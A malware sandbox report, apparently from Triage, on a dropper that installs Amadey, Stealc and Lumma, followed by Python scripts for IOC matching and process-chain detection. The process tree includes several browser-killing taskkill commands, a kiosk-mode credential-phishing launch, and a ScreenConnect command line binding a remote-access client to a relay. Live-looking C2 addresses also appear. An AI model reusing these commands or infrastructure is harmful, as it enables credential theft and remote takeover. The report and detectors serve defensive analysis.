Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/11/2024, 22:25

General

  • Target

    d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe

  • Size

    6.0MB

  • MD5

    d7a40118e6d4686b4a11f4ac49ccaf1d

  • SHA1

    d80be69c93759cfd2bb9dec276979e196202aab1

  • SHA256

    d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c

  • SHA512

    a1126fe60f9891131ac9de04f3b1512e7da0197c168c9d1d3d4632ad52eaf002467220bd5b423d3a21212b558daa444cc4cb40a806cf3f06bf0a7b1b6a5137a3

  • SSDEEP

    98304:7Gb+KW8pO2DH2OP/yErov5MtEkVxXaFwpyAnSWxuv38/oPOYPnAAya0wjSQ/gaY6:7hKW8pRNyUov5Mt9xKFwpBfwrG4z

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

tale

C2

http://185.215.113.206

Attributes
  • url_path

    /6c4adf523b719729.php

Extracted

Family

lumma

C2

https://founpiuer.store/api
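The three extracted configurations above are enough for a network-side match. The Python below is an added example written for this page, not part of the Triage report or of any vendor tooling: it turns the C2 hosts, URL paths, install_dir and install_file from the configs into a matcher and runs it over constructed proxy log lines. The log format (timestamp, client, method, URL, status) and the client addresses are assumptions made for the demonstration; a host match on an unknown path is reported with a "?" suffix so that other traffic to the same C2 IP is still surfaced.

```python
"""IOC matcher built from the C2 configuration extracted above.

Added example, not part of the Triage report. The C2 hosts, URL paths,
install directory and filename come from the Malware Config section; the
proxy log lines below are constructed for the demonstration.
"""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Indicators copied from the extracted configs. Amadey and Stealc give a
# bare C2 host plus a url_path; Lumma's config gives a full URL.
C2_INDICATORS = {
    "amadey": {"hosts": {"185.215.113.43"}, "paths": {"/Zu7JuNko/index.php"}},
    "stealc": {"hosts": {"185.215.113.206"}, "paths": {"/6c4adf523b719729.php"}},
    "lumma":  {"hosts": {"founpiuer.store"}, "paths": {"/api"}},
}

# Host-side artifact from the Amadey config (install_dir\install_file).
AMADEY_INSTALL_RE = re.compile(r"\\abc3bc1985\\skotes\.exe$", re.IGNORECASE)


def classify_url(url: str) -> list[str]:
    """Return the families whose C2 host (and, if present, path) match url.

    A host-only match is reported as 'family?' so that traffic to the same
    IP on an unknown path is still visible but distinguishable.
    """
    parts = urlsplit(url if "://" in url else f"http://{url}")
    host = (parts.hostname or "").lower()
    hits = []
    for family, ioc in C2_INDICATORS.items():
        if host not in ioc["hosts"]:
            continue
        hits.append(family if parts.path in ioc["paths"] else family + "?")
    return hits


# Constructed proxy log (fields: ts, client, method, url, status).
SAMPLE_PROXY_LOG = """\
1730932000.123 10.0.0.7 POST http://185.215.113.43/Zu7JuNko/index.php 200
1730932001.456 10.0.0.7 GET http://185.215.113.206/6c4adf523b719729.php 200
1730932002.789 10.0.0.7 POST https://founpiuer.store/api 200
1730932003.012 10.0.0.9 GET http://185.215.113.43/favicon.ico 404
1730932004.345 10.0.0.9 GET https://www.example.com/ 200
"""


def scan_proxy_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client, url, families) for every line that touches a C2."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line, skip rather than guess field positions
        client, url = fields[1], fields[3]
        families = classify_url(url)
        if families:
            findings.append((client, url, families))
    return findings


def is_amadey_install_path(path: str) -> bool:
    """True when a file path ends in the Amadey install_dir\\install_file pair."""
    return bool(AMADEY_INSTALL_RE.search(path))


if __name__ == "__main__":
    for client, url, fams in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} -> {url}: {', '.join(fams)}")
```

The matcher keys on host and exact path rather than on the full URL string, so a change of scheme or port (Lumma here uses HTTPS, the other two plain HTTP) does not break the match, while query strings appended by the bot are ignored.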

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 15 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 22 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 38 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe
    "C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4040
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1364
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3512
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4180
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe
              "C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1916
              • C:\Windows\SysWOW64\msiexec.exe
                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\d24c72d59e97003e\ScreenConnect.ClientSetup.msi"
                7⤵
                • Enumerates connected drives
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:3448
            • C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe
              "C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6068
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 1580
                7⤵
                • Program crash
                PID:6516
            • C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe
              "C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6652
            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
              "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
              6⤵
                PID:4872
          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exe
            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exe
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2228
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1596
              5⤵
              • Program crash
              PID:3000
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1560
              5⤵
              • Program crash
              PID:824
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exe
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1280
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exe
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:5000
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4068
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1476
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4536
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:776
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:512
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            4⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1524
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b77de24-d33a-40c2-82ec-917f74c4324b} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" gpu
              5⤵
                PID:2004
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2488 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be0f1a05-b263-450d-8841-67ceef0269e4} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" socket
                5⤵
                  PID:4904
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 3260 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb641dc6-a8ec-4210-ba20-2e48fa232a83} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                  5⤵
                    PID:2524
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4032 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 4024 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a44a9c27-ebca-4945-9e46-4bbe5895bd33} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                    5⤵
                      PID:3768
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4664 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4648 -prefMapHandle 4644 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b71c063d-503d-4d6f-9dc5-b8f94127b5ff} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" utility
                      5⤵
                      • Checks processor information in registry
                      PID:4324
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5356 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82748f5c-d07b-4945-8a2b-bc94a7c56175} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                      5⤵
                        PID:5544
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 4 -isForBrowser -prefsHandle 5588 -prefMapHandle 5584 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45596daf-3f2c-48c8-acd8-6ea8f58bd382} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                        5⤵
                          PID:5556
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 5 -isForBrowser -prefsHandle 5780 -prefMapHandle 5776 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd6d0937-0f0b-42ef-93bc-df27b18c8233} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                          5⤵
                            PID:5600
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2228 -ip 2228
    1⤵
    PID:3868
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2228 -ip 2228
    1⤵
    PID:3624
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Boot or Logon Autostart Execution: Authentication Package
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4068
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 501C38EF6B291425D6859961753099A0 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4592
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3246.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240661921 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:7152
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      PID:624
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 7CFBEE859CA79996410C342D7BC32AF0
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1664
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 414DA11BFEF912AFF013CA3881CCDF84 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:5232
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:5856
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6068 -ip 6068
    1⤵
    PID:6484
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6068 -ip 6068
    1⤵
    PID:3304
  • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe
    "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-jo8t3z-relay.screenconnect.com&p=443&s=a79bfa06-e94f-44e4-9b80-51e71f3cd8f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBlgoG8SEwJuyUMAVbS1u9ET8b79k7P%2f7J4ow1fhC2ZualDFO3ArdOiWpDAdhopcBg1REuXbjohRxTcgfk%2fkWJ0WT0qz5dal4OA949TlU4xXVZgsV0RQ27tunoj2Q3J7A0ZtL3jq76NFZjZmVG7GZ8TBeTo5Y06XH33FmoVf9VwzHvTmfCw68ESdxodX61R68SwDT%2feGQQsd4M4MsJXToPLVYZqtW1TRq5D4ltSurcvRmEJarN0C6Zv%2fcAzkHuYmbZkQ9ewAJ6tbcDfe8cR98K4%2f5CyE7xxC2Ljkso4d5K3C2QDFOLofUwV0kLgDGg60cdSrGBhJhxOkipcAOnC%2fXDH&c=zhark&c=&c=&c=&c=&c=&c=&c="
    1⤵
    • Sets service image path in registry
    • Executes dropped EXE
    • Loads dropped DLL
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:552
    • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe
      "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe" "RunRole" "f83338c0-7281-4d35-abce-1ff54289d06a" "User"
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:5624
    • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe
      "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe" "RunRole" "b774de6c-ea05-480c-b37d-f7e18ad61075" "System"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:6168
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:2708
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:6528
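The process tree shows four patterns worth alerting on independently of the sample's hashes: a chain of IExpress self-extractors (IXP000.TMP, IXP001.TMP, IXP002.TMP) each spawning the next stage; 4T753l.exe killing every installed browser with taskkill and then starting Firefox in --kiosk mode on a Google sign-in URL; msiexec installing ScreenConnect.ClientSetup.msi from the user's Temp directory; and the resulting ScreenConnect.ClientService.exe bound to a relay host passed in its command line. The Python below is an added example written for this page, not part of the Triage report or of any vendor product. The command lines are the ones shown in the tree, but the Sysmon-style event records (pid, ppid, image, cmdline) wrapping them are constructed, the public key in the ScreenConnect argument is replaced by REDACTED, and the APPROVED_RELAYS allow-list is a hypothetical placeholder for the relays an organisation actually uses.

```python
"""Detection logic for the process chain in the tree above.

Added example written for this page; not part of the Triage report or of
any vendor product. Command lines are copied from the process tree; the
event records around them and APPROVED_RELAYS are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
# Sign-in hosts whose appearance in a kiosk-mode browser launch is worth flagging.
LOGIN_HOSTS = ("accounts.google.com", "login.microsoftonline.com", "login.live.com")
# Hypothetical allow-list: relay hosts the organisation legitimately uses.
APPROVED_RELAYS: set[str] = set()

TASKKILL_RE = re.compile(r"taskkill\s+/F\s+/IM\s+(\S+)", re.I)
IEXPRESS_DIR_RE = re.compile(r"\\Temp\\IXP\d{3}\.TMP\\", re.I)
TEMP_MSI_RE = re.compile(r'/i\s+"?([^"]*\\AppData\\Local\\Temp\\[^"]*\.msi)', re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def screenconnect_params(cmdline: str) -> dict[str, str]:
    """Parse the quoted '?e=...&h=...&p=...' argument of the ScreenConnect client.

    'h' is the relay host, 'p' the port, 'e' and 'y' the session type and role,
    'c' the first custom property (the operator tag 'zhark' in this report).
    """
    m = re.search(r'"\?([^"]*)"', cmdline)
    if not m:
        return {}
    return {k: v[0] for k, v in parse_qs(m.group(1), keep_blank_values=True).items()}


def analyse(events: list[dict]) -> list[str]:
    """Return one finding per suspicious pattern; an empty list means nothing matched."""
    by_pid = {e["pid"]: e for e in events}
    killed_by_parent: dict[int, set[str]] = {}
    for e in events:  # first pass: which parent killed which browsers
        if basename(e["image"]).lower() == "taskkill.exe":
            m = TASKKILL_RE.search(e["cmdline"])
            if m and m.group(1).lower() in BROWSERS:
                killed_by_parent.setdefault(e["ppid"], set()).add(m.group(1).lower())

    findings = []
    for e in events:
        img, cl, pid = basename(e["image"]).lower(), e["cmdline"], e["pid"]
        if img in BROWSERS and "--kiosk" in cl and any(h in cl for h in LOGIN_HOSTS):
            killed = sorted(killed_by_parent.get(e["ppid"], ()))
            note = f" after parent {e['ppid']} killed {killed}" if killed else ""
            findings.append(f"pid {pid}: {img} started in kiosk mode on a sign-in URL{note}")
        if img == "msiexec.exe" and (m := TEMP_MSI_RE.search(cl)):
            findings.append(f"pid {pid}: msiexec installing a package from user Temp: {m.group(1)}")
        if img == "screenconnect.clientservice.exe":
            p = screenconnect_params(cl)
            if p.get("h") and p["h"] not in APPROVED_RELAYS:
                findings.append(f"pid {pid}: ScreenConnect client bound to unapproved relay "
                                f"{p['h']}:{p.get('p', '?')} (e={p.get('e')}, y={p.get('y')}, c={p.get('c')})")
        parent = by_pid.get(e["ppid"])
        if parent and IEXPRESS_DIR_RE.search(parent["image"]) and IEXPRESS_DIR_RE.search(e["image"]):
            findings.append(f"pid {pid}: nested IExpress dropper chain {basename(parent['image'])} -> {img}")
    return findings


# Constructed events; command lines are those shown in the process tree
# (the ScreenConnect public-key parameter k= is replaced by REDACTED).
T = r"C:\Users\Admin\AppData\Local\Temp"
SC_EXE = r"C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe"
SC_CMDLINE = (f'"{SC_EXE}" "?e=Access&y=Guest&h=instance-jo8t3z-relay.screenconnect.com&p=443'
              '&s=a79bfa06-e94f-44e4-9b80-51e71f3cd8f7&k=REDACTED&c=zhark&c=&c=&c=&c=&c=&c=&c="')
EVENTS = [
    {"pid": 1364, "ppid": 4040, "image": rf"{T}\IXP000.TMP\k3a89.exe", "cmdline": rf"{T}\IXP000.TMP\k3a89.exe"},
    {"pid": 3512, "ppid": 1364, "image": rf"{T}\IXP001.TMP\l3v78.exe", "cmdline": rf"{T}\IXP001.TMP\l3v78.exe"},
    {"pid": 5000, "ppid": 1364, "image": rf"{T}\IXP000.TMP\4T753l.exe", "cmdline": rf"{T}\IXP000.TMP\4T753l.exe"},
    {"pid": 4068, "ppid": 5000, "image": r"C:\Windows\SysWOW64\taskkill.exe", "cmdline": "taskkill /F /IM firefox.exe /T"},
    {"pid": 1476, "ppid": 5000, "image": r"C:\Windows\SysWOW64\taskkill.exe", "cmdline": "taskkill /F /IM chrome.exe /T"},
    {"pid": 512, "ppid": 5000, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking'},
    {"pid": 3448, "ppid": 1916, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": rf'"C:\Windows\System32\msiexec.exe" /i "{T}\ScreenConnect\24.3.7.9067\d24c72d59e97003e\ScreenConnect.ClientSetup.msi"'},
    {"pid": 552, "ppid": 0, "image": SC_EXE, "cmdline": SC_CMDLINE},
]

if __name__ == "__main__":
    for finding in analyse(EVENTS):
        print(finding)
```

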